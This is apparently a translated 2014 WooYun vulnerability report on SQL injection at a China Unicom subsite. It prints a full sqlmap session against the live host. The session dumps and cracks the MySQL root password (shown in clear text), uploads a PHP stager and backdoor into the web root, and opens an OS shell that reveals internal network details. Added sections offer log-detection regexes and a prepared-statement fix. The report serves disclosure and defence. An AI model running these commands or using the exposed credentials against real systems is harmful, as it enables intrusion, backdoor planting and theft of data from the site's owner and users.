Root-privilege MySQL injection on a China Unicom subsite

Vulnerability details

Disclosure status:

2014-03-13: Details sent to the vendor, awaiting the vendor's handling
2014-03-19: Vendor has confirmed; details disclosed to the vendor only
2014-03-29: Details disclosed to core white hats and experts in the relevant field
2014-04-08: Details disclosed to regular white hats
2014-04-18: Details disclosed to intern white hats
2014-04-27: Details disclosed to the public

Brief description:

PHP + MySQL injection with ROOT privileges; a shell can be obtained, and everyone knows what can be done from there.

Detailed description:

I saw this vulnerability on WooYun: 17WO手机验证码绕过可任意修改其他用户密码 (17WO SMS verification code bypass allows changing any other user's password), so I tested it. The vulnerability is still there and has not been fixed. I then went on to check the security of the other subdomains.

A Baidu search for “site:17wo.cn” turned up a likely injection point: http://card.17wo.cn/wap/wap_card.php?id=2548

Feed it to sqlmap:

./sqlmap.py --random-agent --batch --thread 10 -u 'card.17wo.cn/wap/wap_card.php?id=2548' --password

sqlmap/1.0-dev-ab36e5a - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 14:24:01

[14:24:01] [INFO] fetched random HTTP User-Agent header from file '/sqlmap/txt/user-agents.txt': Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.2 Safari/530.5
[14:24:01] [INFO] resuming back-end DBMS 'mysql'
[14:24:01] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=2548 AND 1953=1953

Type: UNION query
Title: MySQL UNION query (NULL) - 1 column
Payload: id=2548 UNION ALL SELECT CONCAT(0x716c647471,0x796b6866457170574455,0x7165736271)#

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=2548 AND SLEEP(5)
---
[14:24:02] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.4, PHP 5.5.3
back-end DBMS: MySQL 5.0.11
[14:24:02] [INFO] fetching database users password hashes
[14:24:02] [WARNING] reflective value(s) found and filtering out
[14:24:02] [INFO] the SQL query used returns 6 entries
[14:24:02] [INFO] starting 6 threads
[14:24:02] [INFO] retrieved: "root","*B80A3FB57E2E58C89333D9AEA9A624B1CB8C4520"
[14:24:03] [INFO] retrieved: "",""
[14:24:03] [INFO] retrieved: "pma",""
[14:24:03] [INFO] retrieved: "",""
[14:24:03] [INFO] retrieved: "root","*B80A3FB57E2E58C89333D9AEA9A624B1CB8C4520"
[14:24:03] [INFO] retrieved: "root",""
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] Y
[14:24:03] [INFO] using hash method 'mysql_passwd'
what dictionary do you want to use?
[1] default dictionary file '/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[14:24:03] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[14:24:03] [INFO] starting dictionary-based cracking (mysql_passwd)
[14:24:03] [INFO] starting 4 processes
[14:24:33] [INFO] cracked password 'wise' for user 'root'
database management system users password hashes:
[*] pma [1]:
password hash: NULL
[*] root [2]:
password hash: *B80A3FB57E2E58C89333D9AEA9A624B1CB8C4520
clear-text password: wise
password hash: NULL

It dumped the root password straight away.

Let's try running a command:

[14:26:46] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.4, PHP 5.5.3
back-end DBMS: MySQL 5.0.11
[14:26:46] [INFO] going to use a web backdoor for command prompt
[14:26:46] [INFO] fingerprinting the back-end DBMS operating system
[14:26:46] [WARNING] reflective value(s) found and filtering out
[14:26:46] [INFO] the back-end DBMS operating system is Windows
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
[14:26:46] [INFO] retrieved the web server document root: 'D:\xampp\htdocs\pailife'
[14:26:46] [INFO] retrieved web server absolute paths: 'D:/xampp/htdocs/pailife/wap/wap_card.php'
[14:26:46] [INFO] trying to upload the file stager on '/' via LIMIT INTO OUTFILE technique
[14:26:47] [WARNING] unable to upload the file stager on '/'
[14:26:47] [INFO] trying to upload the file stager on '/' via UNION technique
[14:26:48] [WARNING] expect junk characters inside the file as a leftover from UNION query
[14:26:48] [INFO] the remote file /tmpujmue.php is larger than the local file /var/folders/9g/xlxjdbd909d7z4lxrr51tj1m0000gn/T/tmpsx2Rm4
[14:26:50] [INFO] trying to upload the file stager on '/wap' via LIMIT INTO OUTFILE technique
[14:26:53] [WARNING] unable to upload the file stager on '/wap'
[14:26:53] [INFO] trying to upload the file stager on '/wap' via UNION technique
[14:26:59] [WARNING] it looks like the file has not been written, this can occur if the DBMS process' user has no write privileges in the destination path
[14:27:00] [INFO] trying to upload the file stager on '/xampp/htdocs/pailife/wap' via LIMIT INTO OUTFILE technique
[14:27:03] [INFO] heuristics detected web page charset 'utf-8'
[14:27:03] [INFO] the file stager has been successfully uploaded on '/xampp/htdocs/pailife/wap' - http://card.17wo.cn:80/wap/tmpujmue.php
[14:27:06] [INFO] heuristics detected web page charset 'ascii'
[14:27:06] [INFO] the backdoor has been successfully uploaded on '/xampp/htdocs/pailife/wap' - http://card.17wo.cn:80/wap/tmpboyhw.php
[14:27:06] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> ipconfig
do you want to retrieve the command standard output? [Y/n/a] Y
[14:27:17] [INFO] heuristics detected web page charset 'GB2312'
command standard output:
---

Windows IP 配置


以太网适配器 本地连接:

连接特定的 DNS 后缀 . . . . . . . :
本地链接 IPv6 地址. . . . . . . . : fe80::3cf0:d229:52:6821
IPv4 地址 . . . . . . . . . . . . : 10.123.176.75
子网掩码 . . . . . . . . . . . . : 255.255.255.224
默认网关. . . . . . . . . . . . . : 10.123.176.67

隧道适配器 本地连接* 4:

连接特定的 DNS 后缀 . . . . . . . :
IPv6 地址 . . . . . . . . . . . . : 2001:0:9d38:6ab8:b0:7d8:f584:4fb4
本地链接 IPv6 地址. . . . . . . . : fe80::b0:7d8:f584:4fb4
默认网关. . . . . . . . . . . . . : ::

隧道适配器 isatap.{DD9307C7-D162-4559-AFA6-28E9AA162058}:

媒体状态 . . . . . . . . . . . . : 媒体已断开
连接特定的 DNS 后缀 . . . . . . . :
---

Works perfectly.

From here you can do anything...
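
For the defending side, here is an added example (not part of the original report) of the trace a session like the one above leaves in an Apache access log: the boolean, UNION and time-based payloads sqlmap reported, and the request to the dropped stager. The log lines are constructed to mirror that session (documentation IP addresses); the regexes and the stager file-name pattern (tmp followed by five letters, the shape of the two file names above) are assumptions of this example.

```php
<?php
// Added example, not part of the original report. The access-log lines below are
// constructed to mirror the sqlmap session shown above (IPs are documentation addresses).
const ACCESS_LOG_SAMPLE = <<<'LOG'
203.0.113.5 - - [13/Mar/2014:14:24:01 +0800] "GET /wap/wap_card.php?id=2548 HTTP/1.1" 200 812
203.0.113.5 - - [13/Mar/2014:14:24:01 +0800] "GET /wap/wap_card.php?id=2548%20AND%201953%3D1953 HTTP/1.1" 200 812
203.0.113.5 - - [13/Mar/2014:14:24:02 +0800] "GET /wap/wap_card.php?id=2548%20UNION%20ALL%20SELECT%20CONCAT%280x716c647471%2C0x796b6866457170574455%2C0x7165736271%29%23 HTTP/1.1" 200 830
203.0.113.5 - - [13/Mar/2014:14:24:02 +0800] "GET /wap/wap_card.php?id=2548%20AND%20SLEEP%285%29 HTTP/1.1" 200 812
203.0.113.5 - - [13/Mar/2014:14:27:06 +0800] "GET /wap/tmpboyhw.php HTTP/1.1" 200 1024
198.51.100.9 - - [13/Mar/2014:14:30:00 +0800] "GET /wap/wap_card.php?id=17 HTTP/1.1" 200 790
LOG;

// Return the reasons a single request path looks like the session above (empty = clean).
function classifyRequest(string $rawPath): array
{
    $path = urldecode($rawPath);   // sqlmap percent-encodes spaces, parentheses, '=' and '#'
    $reasons = [];
    if (preg_match('/\bUNION\b.{0,40}\bSELECT\b/i', $path)) {
        $reasons[] = 'union-select';
    }
    if (preg_match('/\bSLEEP\s*\(\s*\d+\s*\)/i', $path)) {
        $reasons[] = 'time-based';
    }
    if (preg_match('/\bAND\s+(\d+)\s*=\s*\1\b/i', $path)) {
        $reasons[] = 'boolean-tautology';
    }
    if (preg_match('/0x[0-9a-f]{10,}/i', $path)) {
        $reasons[] = 'hex-marker';       // the 0x71..71 delimiters sqlmap wraps its data in
    }
    if (preg_match('#/tmp[a-z]{5}\.php#', $path)) {
        $reasons[] = 'stager-name';      // same shape as tmpujmue.php / tmpboyhw.php above
    }
    return $reasons;
}

// Parse combined-format lines and collect every flagged request, grouped by client IP.
function scanAccessLog(string $log): array
{
    $findings = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        if (!preg_match('/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})/', $line, $m)) {
            continue;                    // not a combined-format line
        }
        [, $ip, $time, $method, $path, $status] = $m;
        $reasons = classifyRequest($path);
        if ($reasons !== []) {
            $findings[$ip][] = ['time' => $time, 'path' => $path, 'status' => $status, 'reasons' => $reasons];
        }
    }
    return $findings;
}

foreach (scanAccessLog(ACCESS_LOG_SAMPLE) as $ip => $hits) {
    printf("%s: %d suspicious request(s)\n", $ip, count($hits));
    foreach ($hits as $h) {
        printf("  [%s] %s  <- %s\n", $h['time'], $h['path'], implode(', ', $h['reasons']));
    }
}
```

On the sample, the three injected requests and the stager request from 203.0.113.5 are flagged and the two plain lookups are not. The decode step matters: the patterns are matched after urldecode, since the payloads arrive percent-encoded; the hex-marker rule is specific to sqlmap's output delimiters, while the other rules catch manual testing too. The stager request is the one to treat as an incident rather than a probe: a 200 on an unknown tmp*.php under the web root means a file was written through the database.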

Before submitting this vulnerability I searched WooYun and found that someone had reported a related issue last year. More than half a year later it still has not been fixed. Consider this report another reminder to the parties concerned.

Proof of vulnerability:

See the detailed description

Fix recommendations:

First, raise security awareness (a vulnerability this old still has not been fixed); second, prevent injection and reduce privileges...
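
As an added example (not code from the report or from the 17wo.cn site, whose source is not shown), here is the vulnerable pattern the report implies beside a hardened version, plus the privilege reduction the fix recommendation calls for. The table `cards`, the database `appdb`, the account `wap_ro` and the environment variable are assumed names; the document root and the hash-dump observations come from the report above.

```php
<?php
// Added example, not the site's own code (the report does not show wap_card.php's
// source). Table `cards`, database `appdb` and account `wap_ro` are assumed names.

// VULNERABLE: the pattern behind "wap_card.php?id=2548". The raw query-string value
// is concatenated into the SQL text, so "2548 AND SLEEP(5)" or a UNION runs as-is.
function lookupCardVulnerable(mysqli $db, string $rawId): ?array
{
    $sql = "SELECT id, name, price FROM cards WHERE id = " . $rawId;
    $res = $db->query($sql);
    return $res ? ($res->fetch_assoc() ?: null) : null;
}

// HARDENED: check the type first, then bind the value in a prepared statement.
// The value travels separately from the SQL text, so it can never alter the query.
function lookupCardSafe(PDO $db, $rawId): ?array
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;                         // anything that is not a positive integer
    }
    $stmt = $db->prepare('SELECT id, name, price FROM cards WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Application connection: a dedicated low-privilege account, never root.
function connectApp(): PDO
{
    return new PDO(
        'mysql:host=127.0.0.1;dbname=appdb;charset=utf8mb4',
        'wap_ro',
        getenv('WAP_DB_PASSWORD') ?: '',
        [
            PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
            PDO::ATTR_EMULATE_PREPARES => false,   // real server-side prepares
        ]
    );
}

// One-off provisioning by a DBA over an administrative connection. SELECT on one
// table only and no FILE privilege: without FILE the INTO OUTFILE write that put the
// stager in D:\xampp\htdocs\pailife\wap is refused even if an injection remains.
function provisionAppUser(PDO $admin, string $password): void
{
    $admin->exec("CREATE USER 'wap_ro'@'localhost' IDENTIFIED BY " . $admin->quote($password));
    $admin->exec("GRANT SELECT ON appdb.cards TO 'wap_ro'@'localhost'");
    // The hash dump above also listed anonymous ('') accounts and a root entry with an
    // empty hash; those need removing as well, and root should not be reachable from
    // the web tier. Setting secure_file_priv in my.ini to a directory outside the
    // web root confines any remaining OUTFILE use.
}

// In wap_card.php:
// $card = lookupCardSafe(connectApp(), $_GET['id'] ?? '');
```

The two halves address the two halves of the recommendation: the prepared statement removes the injection, and the restricted account means that even a missed injection elsewhere cannot read other users' hashes or write files into the document root, which is what turned this report's injection into a shell. Turning off emulated prepares makes PDO send the statement and the bound integer to the server separately rather than interpolating client-side.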

Copyright notice: please credit belerhacker@乌云 when reposting


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 12

Confirmed at: 2014-03-19 10:09

Vendor reply:

CNVD has confirmed and reproduced the described situation and has passed it on via CNCERT directly to China Unicom Group for handling.

Latest status:

None yet

Vulnerability ratings: